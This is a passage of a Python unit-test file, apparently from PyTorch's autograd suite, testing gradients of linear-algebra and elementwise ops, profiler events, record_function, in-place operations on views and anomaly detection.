self.assertTrue(torch.allclose(r1, r2, rtol=0.01, atol=0.0))
torch.autograd.backward(r1, grad)
torch.autograd.backward(r2, grad)
self.assertTrue(torch.allclose(input1.grad, input2.grad, rtol=0.01, atol=0.0))
@slowTest
@skipIfNoLapack
def test_lobpcg(self):
def func(k, A, largest=True, B=None):
X_shape = list(A.shape)
X_shape[-1] = k
X = torch.eye(A.size(-2), k, dtype=A.dtype, device=A.device)
if A.dim() > 2:
X = X.expand(X_shape)
D, U = torch.lobpcg(A=A, k=k, B=B, X=X)
# LOBPCG uses a random initial eigenspace approximation
# if parameter `X` is not provided.
# This may cause a non-deterministic behavior
# when it comes to the sign of an eigenvector
# (note if v is an eigenvector, so is -v),
# hence we eliminate this non-determinism
# by making sure that each column of U
# gets multiplied by the sign of its max (in absolute value) element.
# Also, gradcheck changes the content of the input by +/- eps (default to 1e-06)
# to compute the numerical gradient which can also cause the signs to flip.
_, idx = U.abs().max(-2, keepdim=True)
sign = U.gather(-2, idx).sign()
U = U * sign
return D, U
# TODO: review if this can be ported to OpInfos or moved to test_linalg.py
def run_symeig_test(k, sizes, largest=True):
A = torch.rand(*sizes).double()
A = A.matmul(A.transpose(-1, -2)) / 10
A.requires_grad_(True)
gradcheck(lambda A: func(k, A, largest), A, check_batched_grad=False)
# Custom gradient vectors for better stability due to some
# non-determinism in the lobpcg's forward.
# Note it is not required if symeig is in forward instead (tested).
D_grad = torch.rand(*A.shape[:-2], k) / 100
U_grad = torch.rand(*A.shape[:-1], k) / 100
gradgradcheck(lambda A: func(k, A, largest), A, [D_grad, U_grad], atol=1e-4, check_batched_grad=False)
# check whether A.grad is symmetric
A = A.detach().requires_grad_(True)
D, U = func(k, A, largest)
(D.sum() + U.sum()).backward()
self.assertEqual(A.grad, A.grad.transpose(-1, -2))
# the tests below take about 1-2 minutes to finish,
# but we want to be extra sure that the backward is correct.
for largest in [True, False]:
run_symeig_test(1, (6, 6), largest=largest)
run_symeig_test(1, (2, 6, 6), largest=largest)
run_symeig_test(1, (2, 2, 6, 6), largest=largest)
run_symeig_test(2, (6, 6), largest=largest)
run_symeig_test(2, (2, 6, 6), largest=largest)
run_symeig_test(2, (2, 2, 6, 6), largest=largest)
run_symeig_test(3, (9, 9), largest=largest)
run_symeig_test(3, (2, 9, 9), largest=largest)
run_symeig_test(3, (2, 2, 9, 9), largest=largest)
def test_variable_traverse(self):
def get_out_and_unrefed_cycle():
inp = torch.randn(10, requires_grad=True)
tmp = inp.view(10, 1)
out = tmp.view(10)
# Create a reference cycle that contains an
# intermediary Variable in the graph
my_list = []
my_list.append(tmp)
my_list.append(my_list)
return out
out = get_out_and_unrefed_cycle()
gc.collect()
# This will segfault if things have been erroneously released
out.backward(torch.randn(out.size()))
def test_maximum_and_minimum_subgradient(self):
def run_test(f, a, b, expected_a_grad, expected_b_grad):
a = torch.tensor(a, requires_grad=True)
b = torch.tensor(b, requires_grad=True)
z = f(a, b)
z.sum().backward()
self.assertEqual(a.grad, expected_a_grad)
self.assertEqual(b.grad, expected_b_grad)
run_test(torch.maximum, [0., 1., 2.], [1., 1., 1.], [0., 0.5, 1.], [1., 0.5, 0.])
run_test(torch.minimum, [0., 1., 2.], [1., 1., 1.], [1., 0.5, 0.], [0., 0.5, 1.])
# TODO: norm is deprecated, update these tests and port them to OpInfos
# or test_linalg.py
def test_norm_subgradient(self):
def run_test(input_size, norm_deg):
input = torch.zeros(*input_size, requires_grad=True)
input.norm(norm_deg).backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), 2)
run_test((10, 10), 2)
run_test((10,), 3)
run_test((10,), 1)
run_test((10,), 1.5)
run_test((10,), inf)
def test_norm_inf_subgradient(self):
def run_test(input, expected, dim=None):
x = torch.tensor(input, requires_grad=True)
out = x.norm(inf, dim=dim, keepdim=True)
out.backward(torch.ones(out.size()))
self.assertEqual(x.grad, expected)
run_test([0., 0., 0.], [0., 0., 0.])
run_test([1., 0., 1.], [0.5, 0., 0.5])
run_test([[1., 0., 1.], [0., 1., 1.]], [[0.25, 0., 0.25], [0., 0.25, 0.25]])
run_test([[1., 0., 1.], [0., 1., 0.]], [[0.5, 0., 0.5], [0., 1., 0.]], (1,))
run_test(torch.ones((2, 2, 2)), torch.full((2, 2, 2), 0.25), (0, 2))
# TODO: review porting these to OpInfo tests
def test_pow_zero_tensor_gradient(self):
def run_test(input_size, exponent):
input = torch.zeros(*input_size, requires_grad=True)
input.pow(exponent).sum().backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), torch.zeros(10))
run_test((10, 10), torch.zeros(10, 10))
run_test((10,), 0)
def test_pow_scalar_base(self):
a = torch.arange(1, 13, dtype=torch.double).view(3, 4).requires_grad_()
gradcheck(lambda a: torch.pow(2, a), (a,))
def test_sinc(self):
# The derivative of sinc(x) at x=0 has to be special cased.
# A naive computation will result in 0/0 -> NaN.
# We also need to be careful when we are very close to 0, as the
# derivative's denominator is squared, and there are some floats
# that are positive and whose squares are zero.
a = torch.tensor([0.0, torch.finfo(torch.double).tiny, 1.0],
dtype=torch.double,
requires_grad=True)
gradcheck(torch.sinc, a)
def test_igamma(self):
# 1e-3 offset to avoid zeros
# NOTE: derivative for s is not implemented
s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double) + 1e-3).requires_grad_()
gradcheck(torch.igamma, (s, x))
gradgradcheck(torch.igamma, (s, x))
def test_igammac(self):
# 1e-3 offset to avoid zeros in s
# NOTE: derivative for s is not implemented
s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double)).requires_grad_()
gradcheck(torch.igamma, (s, x))
gradgradcheck(torch.igamma, (s, x))
def test_profiler(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
self.assertTrue(torch.autograd._profiler_enabled())
y = x * 2 + 4
self.assertFalse(torch.autograd._profiler_enabled())
names = ['aten::mul', 'aten::add']
found_indices = set()
for evt in p.function_events:
if evt.name in names:
found_indices.add(names.index(evt.name))
self.assertEquals(len(found_indices), len(names))
def test_profiler_seq_nr(self):
with profile(use_kineto=kineto_available()) as p:
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
z = x + y
s = z.sum()
s.backward()
print(p.key_averages().table(
sort_by="self_cpu_time_total", row_limit=-1))
# expecting aten::add, aten::sum to have the sequence numbers,
# expecting the corresponding backward nodes to have the same numbers
# as the forward ops
add_seq_nr = -1
sum_seq_nr = -1
found_add = found_sum = False
found_bwd_add = found_bwd_sum = False
found_empty = False
for e in p.function_events:
if e.name == "aten::add":
add_seq_nr = e.sequence_nr
self.assertFalse(found_add)
found_add = True
elif e.name == "aten::sum":
sum_seq_nr = e.sequence_nr
self.assertFalse(found_sum)
found_sum = True
elif "Add" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, add_seq_nr)
self.assertFalse(found_bwd_add)
found_bwd_add = True
elif "Sum" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, sum_seq_nr)
self.assertFalse(found_bwd_sum)
found_bwd_sum = True
# check that nested ops (e.g. empty) don't have
# sequence number
if e.name == "aten::empty":
self.assertEqual(e.sequence_nr, -1)
found_empty = True
self.assertGreaterEqual(add_seq_nr, 0)
self.assertGreaterEqual(sum_seq_nr, 0)
self.assertNotEqual(add_seq_nr, sum_seq_nr)
self.assertTrue(found_add)
self.assertTrue(found_sum)
self.assertTrue(found_bwd_add)
self.assertTrue(found_bwd_sum)
self.assertTrue(found_empty)
def test_profiler_unboxed_only(self):
x = torch.rand(3, 4)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
x.resize_([3, 2])
def test_profiler_propagation(self):
def foo(x):
with record_function("in_foo") as rf:
return x * 2
x = torch.rand(3, 4)
traced_foo = torch.jit.trace(foo, x)
def bar(x):
with record_function("in_bar") as rf:
# we expect that profiler will be able
# propagate across fork
fut = torch.jit._fork(traced_foo, x)
y = torch.jit._wait(fut)
# note: continuation (and rf's end) can
# be executed in a different thread
with record_function("in_bar_after_wait") as rf2:
y = y * 2
return y
traced_bar = torch.jit.trace(bar, x)
with profile(use_kineto=kineto_available()) as p:
traced_bar(x)
found_foo = False
found_bar = False
found_bar_after_wait = False
for info in p.function_events:
if info.name == "in_foo":
self.assertFalse(found_foo)
found_foo = True
elif info.name == "in_bar":
self.assertFalse(found_bar)
found_bar = True
elif info.name == "in_bar_after_wait":
self.assertFalse(found_bar_after_wait)
found_bar_after_wait = True
self.assertTrue(found_foo)
self.assertTrue(found_bar)
self.assertTrue(found_bar_after_wait)
def test_record_function_callbacks(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
with record_function("foo"):
y = x * 2 + 4
function_events = p.function_events
foo_event = [event for event in function_events if "foo" in event.name][0]
self.assertEqual(foo_event.count, 1)
def test_profiler_aggregation_fake(self):
events = EventList()
id = [0]
def get_id():
id[0] = id[0] + 1
return id[0]
# [[thread_id, [(start, end, id), ....]], ...]
# Using list instead of a dict so order is guaranteed for any Python
# version
threads = [
[1, [(0, 1, get_id()), (1, 2, get_id())]],
[0, [(0, 2, get_id()), (1, 2, get_id()), (1, 3, get_id())]],
]
for thread, ranges in threads:
for range in ranges:
assert(len(range) == 3)
events.append(
FunctionEvent(
id=range[2],
node_id=0,
name="",
thread=thread,
start_us=range[0],
end_us=range[1],
)
)
events._populate_cpu_children()
# Note that [1, 3] pushes out [0, 2] first. Then we record [1, 2]
# as a child of [1, 3]
res = [[], [], [], [], [4]]
def get_children_ids(event):
return [child.id for child in event.cpu_children]
assert([get_children_ids(event) for event in events] == res)
def test_profiler_aggregation_table(self):
"""
Test if the profiling result is aggregated for `str(prof)`
See: https://github.com/pytorch/pytorch/issues/37500
"""
x = torch.randn(1024)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
torch.einsum("i->", x)
prof_str = str(prof)
prof_table = prof.table()
self.assertEqual(prof_table, prof_str)
def test_profiler_function_event_avg(self):
avg = FunctionEventAvg()
avg.add(FunctionEvent(id=0, node_id=0, name="foo", thread=0, start_us=10, end_us=15))
avg.add(FunctionEvent(id=1, node_id=0, name="foo", thread=0, start_us=20, end_us=30))
avg.add(avg)
self.assertEqual(avg.key, "foo")
# aggregate stats
self.assertEqual(avg.count, 4)
self.assertEqual(avg.cpu_time_total, 30)
self.assertEqual(avg.self_cpu_time_total, 30)
self.assertEqual(avg.cuda_time_total, 0)
# average stats
self.assertEqual(avg.cpu_time, 7.5)
self.assertEqual(avg.cuda_time_total, 0)
def test_profiler_shapes(self):
print("")
layer1 = torch.nn.Linear(20, 30)
layer2 = torch.nn.Linear(30, 40)
input = torch.randn(128, 20)
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
layer2(layer1(input))
print(prof.function_events)
linear_expected_shapes = [
[[128, 20], [30, 20], [30]],
[[128, 30], [40, 30], [40]],
]
found_indices = set()
for event in prof.function_events:
if event.name == "aten::linear":
self.assertTrue(event.input_shapes in linear_expected_shapes)
found_indices.add(linear_expected_shapes.index(event.input_shapes))
self.assertEqual(len(found_indices), len(linear_expected_shapes))
def test_profiler_aggregation_lstm(self):
print("")
rnn = torch.nn.LSTM(10, 20, 2)
total_time_s = 0
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
for i in range(20):
input = torch.randn(5, 3, 10)
h = torch.randn(2, 3, 20)
c = torch.randn(2, 3, 20)
start = time.time()
rnn(input, (h, c))
end = time.time()
total_time_s += end - start
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, header="TEST"))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10))
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, max_src_column_width=300, header="TEST", top_level_events_only=True))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10, top_level_events_only=True))
total_time_us = total_time_s * 1000.0 * 1000.0 # make it us which is profiler default
print(
"Total time based on python measurements: ",
format_time(total_time_us)
)
print(
"CPU time measurement python side overhead: {:.2f}%".format(
(total_time_us / prof.self_cpu_time_total - 1.0) * 100.0
)
)
if sys.platform != "win32":
with tempfile.NamedTemporaryFile() as trace_file:
prof.export_chrome_trace(trace_file.name)
def test_record_function(self):
x = torch.randn(10, 10)
def forward(x):
with record_function("outer"):
y = x * 2 + 4
with record_function("inner"):
y = y - 1
y = y / 1
forward(x)
with profile(use_kineto=kineto_available()) as p:
forward(x)
events = p.function_events
important_events = [
'outer',
'aten::mul',
'aten::add',
'inner',
'aten::sub',
'aten::div'
]
idx = 0
for info in events:
if info.name == important_events[idx]:
idx = idx + 1
if idx == len(important_events):
break
self.assertEqual(idx, len(important_events))
# We can also use record_function to decorate arbitrary function
@record_function('my_func')
def f(x, y):
return x + y
with profile(use_kineto=kineto_available()) as p:
f(1, 2)
self.assertTrue('my_func' in str(p))
def test_record_function_multithreaded(self):
rf = record_function("outer")
rf.__enter__()
with record_function("inner"):
# test that exiting the record function after starting another one
# doesn't throw.
rf.__exit__(None, None, None)
with record_function("inner"):
rf.__enter__()
# test that exiting the record function after ending another one
# doesn't throw.
rf.__exit__(None, None, None)
def test_dir(self):
x = torch.randn(10, 10)
keys = dir(x)
self.assertIn('shape', keys)
# real and imag are only implemented for complex tensors.
y = torch.randn(10, 10, dtype=torch.cfloat)
for key in ['real', 'imag']:
self.assertRaises(RuntimeError, lambda: hasattr(x, key))
self.assertTrue(hasattr(y, key))
keys.remove(key)
for key in keys:
self.assertTrue(hasattr(x, key))
def test_as_strided(self):
def test(x, prepro_fn, size, strides, offset=None):
x = x.to(torch.double).detach().requires_grad_()
# Check that forward will **not** resize storage because it may
# cause NaN in output and fail numerical Jacobian check consequently
with torch.no_grad():
y = prepro_fn(x) if prepro_fn is not None else x
max_offset = sum((si - 1) * st for si, st in zip(size, strides))
max_offset += offset if offset is not None else y.storage_offset()
assert max_offset < len(y.storage()), "test case resizes storage"
def closure(x):
if prepro_fn is not None:
x = prepro_fn(x)
return x.as_strided(size, strides, offset)
gradcheck(closure, [x])
gradgradcheck(closure, [x])
# test
test(torch.arange(0, 25), lambda x: x.view(5, 5), [3, 3], [6, 2], 2)
# test crazy stride at dim with size 1 case
test(torch.randn(12), None, [1, 2, 1, 5], [0, 5, 100, 1], 2)
# test expand case
test(torch.randn(5), None, [3, 3, 3], [0, 1, 0], 2)
test(torch.randn(5), None, [3, 3, 3], [0, 0, 0], 4)
test(torch.randn(5), lambda x: x.expand(5, 5), [5, 5], [0, 1], 0)
# test non-expand overlapping case
test(torch.randn(35), None, [6, 6], [5, 1], 2)
test(torch.randn(15), None, [3, 2], [3, 6], 2)
# test transpose case
test(torch.randn(3, 4), None, [4, 3], [1, 4])
# test "getting things outside the input" case
x = torch.randn(6, 2)
test(x[3:], None, [3, 2], [2, 1], 0) # should be all zeros
self.assertEqual(x[3:].as_strided([3, 2], [2, 1], 0), x[:3])
# test select on expanded input case
test(torch.randn(2, 3), lambda x: x.expand(10, 2, 3), [2, 3], [3, 1], 0)
# TODO: see if these tests can be ported to OpInfos or moved to
# test_tensor_creation_ops.py
def _test_lerp_tensor_weights(self, cast):
def construct_inputs(*shapes):
start = cast(torch.randn(shapes[0], dtype=torch.double)).requires_grad_()
end = cast(torch.randn(shapes[1], dtype=torch.double)).requires_grad_()
weight = cast(torch.randn(shapes[2], dtype=torch.double)).requires_grad_()
return [start, end, weight]
all_test_shapes = [((3, 3, 3), (3, 3, 3), (3, 3, 3)), # no broadcasting
((3,), (3, 3, 3), (3, 3, 3)), # start broadcasting - 1
((3, 3, 3), (3,), (3, 3, 3)), # end broadcasting - 1
((3, 3, 3), (3, 3, 3), (3,)), # weight broadcasting - 1
((), (3, 3, 3), (3, 3, 3)), # start broadcasting - 2
((3, 3, 3), (), (3, 3, 3)), # end broadcasting - 2
((3, 3, 3), (3, 3, 3), ()), # weight broadcasting - 2
((3, 3), (3, 3, 3), (3,))] # all broadcasting
for shapes in all_test_shapes:
cur_inputs = construct_inputs(*shapes)
gradcheck(torch.lerp, cur_inputs)
gradgradcheck(torch.lerp, cur_inputs)
def test_lerp_tensor_weights(self):
self._test_lerp_tensor_weights(lambda t: t)
# TODO: see if these tests can be moved to OpInfos or test_reductions.py
def test_reduce_dtype(self):
def test_reduction(op, has_no_dim, takes_dtype=True):
x = torch.randn(3, 3, dtype=torch.float, requires_grad=True)
if has_no_dim:
grad1, = torch.autograd.grad([op(x)], [x])
grad2, = torch.autograd.grad([op(x, dtype=torch.double)], [x])
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
gi = torch.randn(op(x, dim=0).shape, dtype=torch.float)
grad1, = torch.autograd.grad([op(x, dim=0)], [x], gi)
if takes_dtype:
grad2, = torch.autograd.grad([op(x, dim=0, dtype=torch.double)], [x], gi.double())
else:
grad2, = torch.autograd.grad([op(x.double(), dim=0)], [x], gi.double())
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
test_reduction(torch.sum, True)
test_reduction(torch.prod, True)
test_reduction(torch.cumsum, False)
test_reduction(torch.cumprod, False)
test_reduction(torch.logcumsumexp, False, takes_dtype=False)
def test_inplace_on_view_saved_output(self):
# Test an in-place operation on a view in which the in-place op saves
# its output. Previously, this created a reference cycle.
dealloc = [0]
class IncrementOnDelete(object):
def __del__(self):
dealloc[0] += 1
def test():
root = torch.randn(3, 3, requires_grad=True)
copy = root.clone()
copy.grad_fn.register_hook(IncrementOnDelete())
view = copy.view(9)
torch.nn.functional.relu(view, inplace=True)
test()
self.assertEqual(dealloc[0], 1)
def test_inplace_on_view_leaf_errors(self):
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
x = torch.zeros(1, requires_grad=True)
y = x.view_as(x)
with self.assertRaisesRegex(RuntimeError,
"a view of a leaf Variable that "
"requires grad is being used in "
"an in-place operation."):
y.add_(1)
def test_inplace_on_view_backward(self):
# Issue #10532: Make sure that this does not raise RuntimeError.
net = nn.Sequential(
nn.InstanceNorm2d(2),
nn.ReLU(True)
)
x = torch.tensor([[[[1.0, 1.0]]]], requires_grad=True)
g, = torch.autograd.grad(net(x).pow(2), [x], grad_outputs=x.new_ones(x.shape) , create_graph=True)
torch.autograd.grad(g.sum(), [x])
self.assertEqual(x, torch.tensor([[[[1.0, 1.0]]]]))
# https://discuss.pytorch.org/t/freeing-buffer-strange-behavior/31955/8
inputs = torch.ones((1, 3, 256, 256), requires_grad=True)
tmp1 = (inputs + 1).view_as(inputs)
tmp2 = torch.nn.functional.threshold(tmp1, 0., 0., True)
prob_interpolated = torch.sigmoid(tmp2)
gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=inputs,
grad_outputs=torch.ones(prob_interpolated.size()),
create_graph=True, retain_graph=True)[0]
gradient_penalty = gradients.sum()
gradient_penalty.backward()
fn = gradient_penalty.grad_fn.next_functions[0][0].next_functions[1][0]
self.assertEqual(fn.name(), "ThresholdBackwardBackward")
def test_inplace_on_view_weak_grad_fn(self):
# Issue 23502: Test that b's grad_fn is preserved.
a = torch.arange(10.0, requires_grad=True)
b = a.narrow(0, 0, 2).clone().view(-1)
b.relu_()
c = b.clone()
del b
gc.collect()
s = c.sum()
s.backward()
self.assertEqual(s, torch.tensor(1.0))
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
a = torch.rand(10, requires_grad=True).narrow(0, 0, 10)
with self.assertRaises(RuntimeError):
b = a.relu_()
# TODO: see if these tests can be moved to OpInfo or test_binary_ufuncs.py
def test_mul_out(self):
a = torch.randn(2, 2, requires_grad=True)
b = torch.randn(2, 2, requires_grad=True)
x = torch.zeros_like(a)
# out=... functions don't support automatic differentiation currently
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# the inputs can require grad if we're in no_grad() mode
with torch.no_grad():
torch.mul(a, b, out=x)
self.assertEqual(x, a * b)
def test_mul_out_result_requires_grad(self):
a = torch.randn(2, 2)
b = torch.randn(2, 2)
x = torch.zeros(2, 2, requires_grad=True)
# we should throw an exception if the output requires grad
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# TODO: see if this test can be OpInfo'd or moved to diagonal's test suite
def test_diagonal_derivative_requires_grad(self):
# test that the backward requires grad
# we do this is because diagonal_backward uses inplace
# operations and gradgradcheck does not catch whether
# they works as expected (it will succeed even if
# the gradient has requires_grad == False
a = torch.randn(5, 6, requires_grad=True)
b = torch.diagonal(a)**2
c = b.sum()
d, = torch.autograd.grad(c, a, retain_graph=True, create_graph=True)
self.assertTrue(d.requires_grad)
def test_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
gI = gO.clone().expand(size)
gI[0] = 0
gI[0] /= 0 # Generate a nan
if ctx.fail_0th:
return gI, None, None
else:
return None, gI, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
out.backward() # Should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 0th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out.backward()
self.assertIn('No forward pass information', str(w[0].message))
inp = torch.rand(size, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 1th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out = MyFunc.apply(inp, inp, False)
out.backward()
self.assertIn('MyFunc.apply', str(w[0].message))
def test_nested_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, fail_0th):
ctx.fail_0th = fail_0th
ctx.save_for_backward(inp1)
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
inp, = ctx.saved_tensors
fail_0th = ctx.fail_0th
g = gO.clone().expand(size)
gI = MyFunc2.apply(g * inp, g + inp, fail_0th)
return gI, None
class MyFunc2(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1 * 2.0 + inp2
@staticmethod
def backward(ctx, gO):
fail_0th = ctx.fail_0th
g1 = gO.clone()
g2 = gO.clone()
g1[0] = 0
g2[0] = 0
# generate a nan
if fail_0th:
g1[0] /= 0
else:
g2[0] /= 0
return g1, g2, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward() # should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
gsum.backward()
self.assertIn('No forward pass information', str(w[1].message))
inp = torch.rand(size, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 1th output."):
with detect_anomaly():
out = MyFunc.apply(inp, False)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward()
self.assertIn('MyFunc2.apply', str(w[1].message))
self.assertIn('MyFunc.apply', str(w[2].message))
def test_anomaly_grad_warnings(self):
# PyTorch won't throw warnings if there is an error
# but we'd want to at least see them in stderr
class StdErrDiverter:
def __enter__(self):
self.stderr_orig = sys.stderr
self.stderr_new = io.StringIO()
sys.stderr = self.stderr_new
return self
def __exit__(self, *args):
self.captured = self.stderr_new.getvalue()
sys.stderr = self.stderr_orig
# if the warnings don't throw, they will be handled as regular warnings
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 2)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', str(w[1].message))
# if the warning throws, it will be printed to sys.stderr
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
warnings.simplefilter("error")
with StdErrDiverter() as s:
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 1)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', s.captured)
def test_anomaly_assign_parent_cleanup(self):
# Test that python objects created are properly cleaned up when assign_parent is called
import weakref
def get_ref():
# we use torch.exp here but any function that will construct a new node in its
# backward call in grad mode will work
x = torch.randn(2, 2, requires_grad=True)
t = x.exp()
# ExpBackward calls mul, creating the MulBackward node when create_graph=True.
# In anomaly mode, a PyObject referencing MulBackward's "parent" ExpBackward is added to
# MulBackward's anomaly metadata dict, creating the following reference chain:
#
# grad -> MulBackward -> PyObject -> ExpBackward
#
with detect_anomaly():
grad = torch.autograd.grad(t, x, torch.ones_like(t), create_graph=True)
# We add a weak reference to a new Foo object, which we insert into ExpBackward's metadata dict
#
# (PyObject) -> ExpBackward -> dict -> *Foo*
# t ----^ WeakRef ---^
#
# We want to test that when grad goes out of scope at the end of this function that PyObject is destroyed
# We can test this by seeing whether Foo is not kept alive once t is destroyed
class Foo(object):
pass
my_obj = Foo()
meta_dict = t.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return t, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
def test_nested_anomaly_printstack_cleanup(self):
# Test if metadata dict PyObject is properly destroyed
import weakref
def get_ref():
# This is similar to the construction in test_anomaly_assign_parent_cleanup:
#
# MyFuncBackward2 -> PyObject -> MyFuncBackward -> dict -> Foo
# out ---^ WeakRef ---^
#
# We want to check that Foo is still properly destroyed even when MyFunc2Backward's
# AnomalyMetadata calls printstack, which does some python object manipulation.
#
# You might be wondering why we still have to test_anomaly_assign_parent_cleanup,
# since if PyObject is not destroyed here, wouldn't this test would detect that also?
# The answer is that custom function's PyObject (THPFunction) actually only hold
# a weak reference to the c++ node!
class MyFunc(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
return MyFunc2.apply(x)
class MyFunc2(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, gO):
return gO + float("NaN")
inp = torch.rand(1, requires_grad=True)
out = MyFunc.apply(inp)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
ginp.backward()
class Foo(object):
pass
my_obj = Foo()
meta_dict = out.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return out, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
# TODO: update these tests to use the linalg module and move to test_linalg.py
@skipIfNoLapack
def test_eig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_eig_complex_eigenvalues(self):
A = torch.tensor([[0., -1.], [1., 0.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=True)
with self.assertRaisesRegex(RuntimeError, 'does not support complex eigenvalues'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_symeig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.symeig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_svd_no_singularvectors(self):
A = torch.randn(2, 2, dtype=torch.float32, requires_grad=True)
u, s, v = torch.svd(A, compute_uv=False)
with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'):
torch.autograd.backward([u, s, v], [torch.ones_like(u), torch.ones_like(s), torch.ones_like(v)])
def test_no_grad_copy(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
NonContGradFunc.apply(MyFunc.apply(a, b)).backward()
self.assertFalse(a.grad.data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(b.grad.data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for one of a,b
a.grad = b.grad = None
MyFunc.apply(a, b)[1][0].backward()
p_g = MyFunc.static_grad_ptr
p_a = a.grad.data_ptr()
p_b = b.grad.data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
